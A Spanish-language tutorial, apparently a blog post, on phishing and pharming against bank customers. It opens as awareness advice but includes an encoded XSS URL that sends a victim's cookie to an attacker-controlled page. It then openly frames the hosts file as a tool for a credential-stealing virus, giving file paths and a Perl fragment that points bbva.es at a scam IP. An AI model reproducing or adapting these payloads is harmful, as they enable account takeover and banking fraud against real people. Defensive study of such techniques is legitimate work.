¿Que es el Pishing?
Según la wikipedia, el Pishing es lo siguiente:
“Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas.”
Básicamente, el Pishing consiste en substraer datos confidenciales (contraseñas, datos bancarios…) mediante la imitación de una pagina de seguridad (la del mismo banco).

¿Como evitar el Pishing?
Es fundamental fijarse en los links de las paginas del banco, ya que muchas veces pueden no ser exactamente como tienen que ser, por ejemplo, supongamos que tenemos lo siguiente:

<script language="JavaScript">
function Redireccion() {
var pass = prompt(" Introduce la password:", "")
if(pass == null)
{
alert("Debes especificar tu password para poder entrar.")
if (confirm("¿Quieres intentarlo de nuevo?"))
{
Redireccion()
}
}
window.open("http://www.tubanco.com/usuarios.php?pass=" +
pass)
}
</script>
Este seria el supuesto javascript correcto, pues, para hacer un pishing a este código, sencillamente tendríamos que cambiar esta linea:

window.open(”http://www.tubanco.com/usuarios.php?pass=” +
pass)

por una pagina nuestra que recopilará las passwords introducidas. Muchos Pishers intentan aprovecharse de esto creando subdominios muy parecidos al que intentan Pishear, en este caso, serian del orden de:

– http://www.tubanco.hostinggratuito.com
– http: //www.tubanco@hostinggratuito.com

Si el usuario se fija en que las url’s de los links son correctas no hay posibilidad de Pishing de este tipo.

Phishing Avanzado
Las técnicas Phising mas avanzadas utilizan mezclas de html + javascript para confundir al usuario, ya que con javascript pueden pegar una foto sobre la dirección real y simular se una dirección tipo www.tubanco.com.
Otras opciones es buscar vulnerabilidades tipo Xss en la web del banco, que conlleva la ejecución de código javascript dentro de la web del banco. Un ejemplo seria el siguiente:

http://www.tubanco.com/accesosvulnerable.php?pass=”>

Una vez con la cookie, si la victima ya estaba logueada, el atacante se puede entrar en la cuenta de la victima sin necesitad de introducir ninguna contraseña. Cabe decir, que el link del robo de cookies se podría detectar muy fácilmente por el
usuario, para esconder esa información, el atacante puede codificar esa cadena del javascript en hexadecimal, quedando así:

http://www.tubanco.com/accesosvulnerable.php?pass=%22%3e%3
c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74
%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3
a%2f%2f%77%77%77%2e%70%61%67%69%6e%61%64%65%6c%
61%74%61%63%61%6e%74%65%2e%63%6f%6d%2f%72%65%67
%69%73%74%72%6f%64%65%63%6f%6f%6b%69%65%73%2e%7
0%68%70%3f%63%6f%6f%6b%69%65%3d%27%20%20%20%64%
6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%
73%63%72%69%70%74%3e

Una vez asi es imposible advertir que detrás de esos caracteres en hexadecimal se encuentra una instrucción para robarnos la cookie. Es conveniente, que si se encuentran una url de estas características, lo descodifiquen, para ver si en realidad debemos o no entrar en ese link.
Actualmente, muchos bancos han implementado la seguridad https en sus pagina, lo que garantiza que la información, antes de ser transferida, será codificada, asegurándonos así que si un atacante lograra interceptar nuestros datos, los tendría que descodificar.

Hoy me gustaría hablarles del pharming, principalmente de su uso y abuso.
Es una vulnerabilidad que reside en los servidores DNS, aquellos servidores que transforman URLs a IPs. La vulnerabilidad tiene varios usos y muchos de ellos son fines no legales, como puede ser el Phising, una de las prioridades de esta vulnerabilidad.

Más que nada quiero enfocar este texto al uso práctico de virus creados para el robo de credenciales.

#Hosts.

En todos los sistemas operativos, ya sean de particulares o empresas poseen un archivo llamado ‘hosts’ en el se encuentran las URLs y las IPs a las que se dirigen.
Si nosotros podemos escribir en ese archivo ‘hosts’ podríamos hacer que al entrar a google.com fuera a www.performsec.com. Veamos un ejemplo:

127.0.0.1 localhost

Esto quiere decir que localhost se resuelve como 127.0.0.1, es por ello por lo que cuando ponemos localhost en nuestro navegador nos dirigimos a nuestra máquina.

#Rutas.

# Windows 95/98/Me: C:\Windows\Hosts
# Windows NT/2000: C:\WINNT\System32\drivers\etc
# Windows XP: C:\WINDOWS\system32\drivers\etc
# Windows 2003: C:\WINDOWS\system32\drivers\etc
# Windows Vista: C:\WINDOWS\system32\drivers\etc
# Unix (en general): /etc/hosts
# Linux (en general): /etc/hosts
# MacOS (en general): /etc/hosts
En esos directorios se encuetra un archivo llamado ‘hosts’. El cual podemos modificar a nuestro gusto.

#Code.

Si queremos crear un virus dedicado al robo de credenciales bancarias el uso de la técnica Pharming nos dará muchos resultados. Imaginemos que tenemos un Scam del ‘Banco BBVA’ en la IP = 85.235.65.99 y qeremos que la víctima que a sido infectada por el virus al entrar a la web oficial del ‘Banco BBVA’, redireccione a nuestro Scam. Para eso haríamos esto:

85.235.65.99 bbva.es

La programación del virus:

my $mensaje = "85.235.65.99 bbva.es";$dir = ' C:\WINDOWS\system32\drivers\etc\hosts ';

print HOSTS $mensaje;